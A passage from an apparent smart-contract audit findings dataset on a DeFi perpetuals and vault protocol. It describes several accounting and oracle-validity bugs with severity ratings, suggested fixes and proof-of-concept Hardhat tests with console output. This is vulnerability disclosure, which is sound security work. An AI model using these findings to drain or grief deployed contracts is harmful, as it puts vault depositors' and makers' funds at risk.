accumulations multiply by oracle version's price (which is 0), thus during these time intervals fees and funding are 0.\\nThis will happen by itself during any period when there are no orders, because oracle provider's settlement callback uses `market.update` with empty order to settle user account, thus any non-empty order is always followed by an empty order for the next version and `price = 0` will be used to settle it until the next non-empty order:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('no fees accumulation due to invalid version with price = 0', async () => {\\n\\nfunction setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n}\\n\\nfunction setupOracleAt(price: string, valid : boolean, timestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: valid,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n}\\n\\nconst riskParameter = { // rest of code(await market.riskParameter()) }\\nconst riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\nriskParameterMakerFee.linearFee = parse6decimal('0.005')\\nriskParameterMakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.makerFee = riskParameterMakerFee\\nconst riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\nriskParameterTakerFee.linearFee = 
parse6decimal('0.005')\\nriskParameterTakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.takerFee = riskParameterTakerFee\\nawait market.connect(owner).updateRiskParameter(riskParameter)\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nsetupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\nawait market\\n .connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\nsetupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is commited at timestamp+200\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is not commited at timestamp+300\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 400);\\nsetupOracleAt('0', false, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// settle to see makerValue at all versions\\nsetupOracle('100', TIMESTAMP + 400, TIMESTAMP + 500);\\n\\nawait market.settle(user.address);\\nawait market.settle(userB.address);\\n\\nvar ver = await market.versions(TIMESTAMP + 200);\\nconsole.log(\"version 200: longValue: \" + ver.longValue + \" makerValue: \" + ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 300);\\nconsole.log(\"version 300: longValue: \" + ver.longValue + \" makerValue: \" + 
ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 400);\\nconsole.log(\"version 400: longValue: \" + ver.longValue + \" makerValue: \" + ver.makerValue);\\n})\\n```\\n\\nConsole log:\\n```\\nversion 200: longValue: -318 makerValue: 285\\nversion 300: longValue: -100000637 makerValue: 100500571\\nversion 400: longValue: -637 makerValue: 571\\n```\\n\\nNotice, that fees are accumulated between versions 200 and 300, version 300 has huge pnl (because it's evaluated at price = 0), which then returns to normal at version 400, but no fees are accumulated between version 300 and 400 due to version 300 having `price = 0`.чKeep the price from the previous valid oracle version and use it instead of oracle version's one if oracle version's price == 0.чAll fees and funding are incorrectly calculated as 0 during any period when there are no non-empty orders (which will be substantially more than 50% of the time, more like 90% of the time). Since most fees and funding are received by makers as a compensation for their price risk, this means makers will lose all these under-calculated fees and will receive a lot less fees and funding than expected.ч```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n -Vault global shares and assets change will mismatch local shares and assets change during settlement due to incorrect `_withoutSettlementFeeGlobal` formulaчhighчEvery vault update, which involves change of position in the underlying markets, `settlementFee` is charged by the Market. Since many users can deposit and redeem during the same oracle version, this `settlementFee` is shared equally between all users of the same oracle version. 
However, there is an issue in that `settlementFee` is charged once both for deposits and redeems, however `_withoutSettlementFeeGlobal` subtracts `settlementFee` in full both for deposits and redeems, meaning that for global fee, it's basically subtracted twice (once for deposits, and another time for redeems). But for local fee, it's subtracted proportional to `checkpoint.orders`, with sum of fee subtracted equal to exactly `settlementFee` (once). This difference in global and local `settlementFee` calculations leads to inflated `shares` and `assets` added for user deposits (local state) compared to vault overall (global state).\\nHere is an easy scenario to demonstrate the issue:\\nSettlementFee = `$10`\\nUser1 deposits `$10` for oracle version `t = 100`\\nUser2 redeems `10 shares` (worth $10) for the same oracle version `t = 100` (checkpoint.orders = 2)\\nOnce the oracle version `t = 100` settles, we have the following: 4.1. Global deposits = `$10`, redeems = `$10` 4.2. Global deposits convert to `0 shares` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.3. Global redeems convert to `0 assets` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.4. User1 deposit of `$10` converts to `5 shares` (because `_withoutSettlementFeeLocal(10)` applies `settlementFee` of `$5` (because there are 2 orders), returning 10-5=5) 4.5. User2 redeem of `10 shares` converts to `$5` (for the same reason)\\nFrom the example above it can be seen that:\\nUser1 receives 5 shares, but global vault shares didn't increase. 
Over time this difference will keep growing potentially leading to a situation where many user redeems will lead to 0 global shares, but many users will still have local shares which they will be unable to redeem due to underflow, thus losing funds.\\nUser2's assets which he can claim increase by $5, but global claimable assets didn't change, meaning User2 will be unable to claim assets due to underflow when trying to decrease global assets, leading to loss of funds for User2.\\nThe underflow in both cases will happen in `Vault._update` when trying to update global account:\\n```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\nчCalculate total orders to deposit and total orders to redeem (in addition to total orders overall). Then `settlementFee` should be multiplied by `deposit/orders` for `toGlobalShares` and by `redeems/orders` for `toGlobalAssets`. This weightening of `settlementFee` will make it in-line with local order weights.чAny time there are both deposits and redeems in the same oracle version, the users receive more (local) shares and assets than overall vault shares and assets increase (global). 
This mismatch causes:\\nSystematic increase of (sum of user shares - global shares), which can lead to bank run since the last users who try to redeem will be unable to do so due to underflow.\\nSystematic increase of (sum of user assets - global assets), which will lead to users being unable to claim their redeemed assets due to underflow.\\nThe total difference in local and global `shares+assets` equals to `settlementFee` per each oracle version with both deposits and redeems. This can add up to significant amounts (at `settlementFee` = $1 this can be $100-$1000 per day), meaning it will quickly become visible especially for point 2., because typically global claimable assets are at or near 0 most of the time, since users usually redeem and then immediately claim, thus any difference of global and local assets will quickly lead to users being unable to claim.ч```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\n -Requested oracle versions, which have expired, must return this oracle version as invalid, but they return it as a normal version with previous version's price insteadчhighчEach market action requests a new oracle version which must be commited by the keepers. 
However, if keepers are unable to commit requested version's price (for example, no price is available at the time interval, network or keepers are down), then after a certain timeout this oracle version will be commited as invalid, using the previous valid version's price.\\nThe issue is that when this expired oracle version is used by the market (using oracle.at), the version returned will be valid (valid = true), because oracle returns version as invalid only if `price = 0`, but the `commit` function sets the previous version's price for these, thus it's not 0.\\nThis leads to market using invalid versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.\\nWhen requested oracle version is commited, but is expired (commited after a certain timeout), the price of the previous valid version is set to this expired oracle version:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nLater, `Market._processOrderGlobal` reads the oracle version using the `oracle.at`, invalidating the order if the version is invalid:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp);\\n\\n context.pending.global.sub(newOrder);\\n if (!oracleVersion.valid) newOrder.invalidate();\\n```\\n\\nHowever, expired oracle version will return `valid = true`, because this flag is only set to `false` if price = 
0:\\n```\\nfunction at(uint256 timestamp) public view returns (OracleVersion memory oracleVersion) {\\n (oracleVersion.timestamp, oracleVersion.price) = (timestamp, _prices[timestamp]);\\n oracleVersion.valid = !oracleVersion.price.isZero(); // @audit <<< valid = false only if price = 0\\n}\\n```\\n\\nThis means that `_processOrderGlobal` will treat this expired oracle version as valid and won't invalidate the order.чAdd validity map along with the price map to `KeeperOracle` when recording commited price.чMarket uses invalid (expired) oracle versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.ч```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n -When vault's market weight is set to 0 to remove the market from the vault, vault's leverage in this market is immediately set to max leverage risking position liquidationчmediumчIf any market has to be removed from the vault, the only way to do this is via setting this market's weight to 0. The problem is that the first vault rebalance will immediately withdraw max possible collateral from this market, leaving vault's leverage at max possible leverage, risking the vault's position liquidation. This is especially dangerous if vault's position in this removed market can not be closed due to high skew, so min position is not 0, but the leverage will be at max possible value. 
As a result, vault depositors can lose funds due to liquidation of vault's position in this market.\\nWhen vault is rebalanced, each market's collateral is calculated as following:\\n```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n\\nFor removed markets (weight = 0), `marketCollateral` will be set to `marketContext.margin` (i.e. minimum valid collateral to have position at max leverage), `marketAssets` will be set to 0. But later the position will be adjusted in case minPosition is not 0:\\n```\\n target.position = marketAssets\\n .muldiv(marketContext.registration.leverage, marketContext.latestPrice.abs())\\n .max(marketContext.minPosition)\\n .min(marketContext.maxPosition);\\n```\\n\\nThis means that vault's position in the market with weight 0 will be at max leverage until liquidated or position can be closed.\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n console.log(\"pos1 = \" + (await position()) + \" pos2 = \" + (await btcPosition()) + \" col1 = \" + (await collateralInVault()) + \" col2 = \" + (await btcCollateralInVault()));\\n\\n // update weight\\n await vault.connect(owner).updateWeights([parse6decimal('1.0'), 
parse6decimal('0')])\\n\\n // do small withdrawal to trigger rebalance\\n await vault.connect(user).update(user.address, 0, smallDeposit, 0)\\n await updateOracle()\\n\\n console.log(\"pos1 = \" + (await position()) + \" pos2 = \" + (await btcPosition()) + \" col1 = \" + (await collateralInVault()) + \" col2 = \" + (await btcCollateralInVault()));\\n })\\n```\\n\\nConsole log:\\n```\\npos1 = 12224846 pos2 = 206187 col1 = 8008000000 col2 = 2002000000\\npos1 = 12224846 pos2 = 206187 col1 = 9209203452 col2 = 800796548\\n```\\n\\nNotice, that after rebalance, position in the removed market (pos2) is still the same, but the collateral (col2) reduced to minimum allowed.чEnsure that the market's collateral is based on leverage even if `weight = 0`чMarket removed from the vault (weight set to 0) is put at max leverage and has a high risk of being liquidated, thus losing vault depositors funds.ч```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n -Makers can lose funds from price movement even when no long and short positions are opened, due to incorrect distribution of adiabatic fees exposure between makersчmediumчAdiabatic fees introduced in this new update of the protocol (v2.3) were introduced to solve the problem of adiabatic fees netting out to 0 in market token's rather than in USD terms. With the new versions, this problem is solved and adiabatic fees now net out to 0 in USD terms. However, they net out to 0 only for the whole makers pool, but each individual maker can have profit or loss from adiabatic fees at different price levels all else being equal. 
This creates unexpected risk of loss of funds from adiabatic fees for individual makers, which can be significant, up to several percents of the amount invested.\\nThe issue is demonstrated in the following scenario:\\n`price = 1`\\nAlice open `maker = 10` (collateral = +0.9 from adiabatic fee)\\nBob opens `maker = 10` (collateral = +0.7 from adiabatic fee)\\nPath A. `price = 1`. Bob closes (final collateral = +0), Alice closes (final collaterral = +0)\\nPath B. `price = 2`. Bob closes (final collateral = +0.1), Alice closes (final collaterral = -0.1)\\nPath C. `price = 0.5`. Bob closes (final collateral = -0.05), Alice closes (final collateral = +0.05)\\nNotice that both Alice and Bob are the only makers, there are 0 longs and 0 shorts, but still both Alice and Bob pnl depends on the market price due to pnl from adiabatic fees. Adiabatic fees net out to 0 for all makers aggregated (Alice + Bob), but not for individual makers. Individual makers pnl from adiabatic fees is more or less random depending on the other makers who have opened.\\nIf Alice were the only maker, then:\\nprice = 1\\nAlice opens `maker = 10` (collateral = +0.9)\\nprice = 2: exposure adjusted +0.9 (Alice collateral = +1.8)\\nAlice closes `maker = 10` (adiabatic fees = `-1.8`, Alice final collateral = 0)\\nFor the lone maker there is no such problem, final collateral is 0 regardless of price. The core of the issue lies in the fact that the maker's adiabatic fees exposure adjustment is weighted by makers open maker amount. So in the first example:\\nprice = 1. Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split evenly between Alice and Bob (+0.8 for each)\\nAlice new exposure = 0.9 + 0.8 = +1.7 (but adiabatic fees paid to close = -1.8)\\nBob new exposure = 0.7 + 0.8 = +1.5 (but adiabatic fees paid to close = -1.4)\\nIf maker exposure adjustment was weighted by individual makers exposure, then all is correct:\\nprice = 1. 
Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split 0.9:0.7 between Alice and Bob, e.g. +0.9 for Alice, +0.7 for Bob\\nAlice new exposure = 0.9 + 0.9 = +1.8 (adiabatic fees paid to close = -1.8, net out to 0)\\nBob new exposure = 0.7 + 0.7 = +1.4 (adiabatic fees paid to close = -1.4, net out to 0)\\nIn the worst case, in the example above, if Bob opens `maker = 40` (adiabatic fees scale = 50), then at `price = 2`, Alice's final collateral is `-0.4` due to adiabatic fees. Given that Alice's position is 10 at `price = 2` (notional = 20), a loss of `-0.4` is a loss of `-2%` at 1x leverage, which is quite significant.\\nThe scenario above is demonstrated in the test, change the following test in test/unit/market/Market.test.ts:\\n```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(\"user collateral = \" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(\"userB collateral = \" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(\"ver\" + ver + \": makerValue=\" + v.makerValue + \" longValue=\" + v.longValue + \\n \" makerPosFee=\" + v.makerPosFee + 
\" makerNegFee=\" + v.makerNegFee +\\n \" takerPosFee=\" + v.takerPosFee + \" takerNegFee=\" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n 
setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n\\nConsole log:\\n```\\nuser collateral = 10000000000\\nuserB collateral = 0\\nver1636401093: makerValue=0 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000000000\\nver1636401193: makerValue=0 longValue=0 makerPosFee=9000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000070000\\nver1636401293: makerValue=0 longValue=0 makerPosFee=7000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000150000\\nver1636401393: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000010000\\nver1636401493: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=-14000 takerPosFee=0 takerNegFee=0\\nuser collateral = 9999990000\\nuserB collateral = 10000010000\\nver1636401593: makerValue=-5500 longValue=0 makerPosFee=0 makerNegFee=-4500 takerPosFee=0 takerNegFee=0\\n```\\n\\nNotice, that final user balance is -0.1 and final userB balance is +0.1чSplit the total maker exposure by individual maker's exposure rather than by their position size. 
To do this:\\nAdd another accumulator to track total `exposure`\\nAdd individual maker `exposure` to user's `Local` storage\\nWhen accumulating local storage in the checkpoint, account global accumulator `exposure` weighted by individual user's `exposure`.чIndividual makers bear an additional undocumented price risk due to adiabatic fees, which is quite significant (can be several percentages of the notional).ч```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(\"user collateral = \" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(\"userB collateral = \" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(\"ver\" + ver + \": makerValue=\" + v.makerValue + \" longValue=\" + v.longValue + \\n \" makerPosFee=\" + v.makerPosFee + \" makerNegFee=\" + v.makerNegFee +\\n \" takerPosFee=\" + v.takerPosFee + \" takerNegFee=\" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = 
parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await 
market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n -All transactions to claim assets from the vault will revert in some situations due to double subtraction of the claimed assets in market position allocations calculation.чmediumчWhen `assets` are claimed from the vault (Vault.update(0,0,x) called), the vault rebalances its collateral. There is an issue with market positions allocation calculations: the `assets` (\"total position\") subtract claimed amount twice. This leads to revert in case this incorrect `assets` amount is less than `minAssets` (caused by market's minPosition). In situations when the vault can't redeem due to some market's position being at the `minPosition` (because of the market's skew, which disallows makers to reduce their positions), this will lead to all users being unable to claim any `assets` which were already redeemed and settled.\\n`Vault.update` rebalances collateral by calling _manage:\\n```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n\\nIn the rebalance calculations, collateral and assets (assets here stands for \"total vault position\") are calculated as following:\\n```\\n UFixed6 collateral = UFixed6Lib.unsafeFrom(strategy.totalCollateral).add(deposit).unsafeSub(withdrawal);\\n UFixed6 assets = collateral.unsafeSub(ineligable);\\n\\n if (collateral.lt(strategy.totalMargin)) revert StrategyLibInsufficientCollateralError();\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\n`ineligable` is calculated as following:\\n```\\nfunction _ineligable(Context memory context, UFixed6 withdrawal) private pure returns (UFixed6) {\\n // assets eligable for redemption\\n UFixed6 redemptionEligable = 
UFixed6Lib.unsafeFrom(context.totalCollateral)\\n .unsafeSub(withdrawal)\\n .unsafeSub(context.global.assets)\\n .unsafeSub(context.global.deposit);\\n\\n return redemptionEligable\\n // approximate assets up for redemption\\n .mul(context.global.redemption.unsafeDiv(context.global.shares.add(context.global.redemption)))\\n // assets pending claim\\n .add(context.global.assets)\\n // assets withdrawing\\n .add(withdrawal);\\n}\\n```\\n\\nNotice that `ineligable` adds `withdrawal` in the end (which is the assets claimed by the user). Now back to collateral and assets calculation:\\n`collateral = totalCollateral + deposit - withdrawal`\\n`assets = collateral - ineligable = collateral - (redemptionEligable * redemption / (redemption + shares) + global.assets + withdrawal)`\\n`assets = totalCollateral + deposit - withdrawal - [redemptionIneligable] - global.assets - withdrawal`\\n`assets = totalCollateral + deposit - [redemptionIneligable] - global.assets - 2 * withdrawal`\\nSee that `withdrawal` (assets claimed by the user) is subtracted twice in assets calculations. This means that assets calculated are smaller than it should. In particular, assets might become less than minAssets thus reverting in the following line:\\n```\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\nPossible scenario for this issue to cause inability to claim funds:\\nSome vault market's has a high skew (|long - short|), which means that minimum maker position is limited by the skew.\\nUser redeems large amount from the vault, reducing vault's position in that market so that market maker ~= |long - short|. 
This means that further redeems from the vault are not possible because the vault can't reduce its position in the market.\\nAfter that, the user tries to claim what he has redeemed, but all attempts to redeem will revert (both for this user and for any other user that might want to claim)\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n var half = smallDeposit.add(largeDeposit).div(2).add(smallDeposit);\\n await vault.connect(user).update(user.address, 0, half, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).update(user2.address, smallDeposit, 0, 0) // this will create min position in the market\\n await vault.connect(user).update(user.address, 0, 0, half) // this will revert even though it's just claiming\\n })\\n```\\n\\nThe last line in the test will revert, even though it's just claiming assets. 
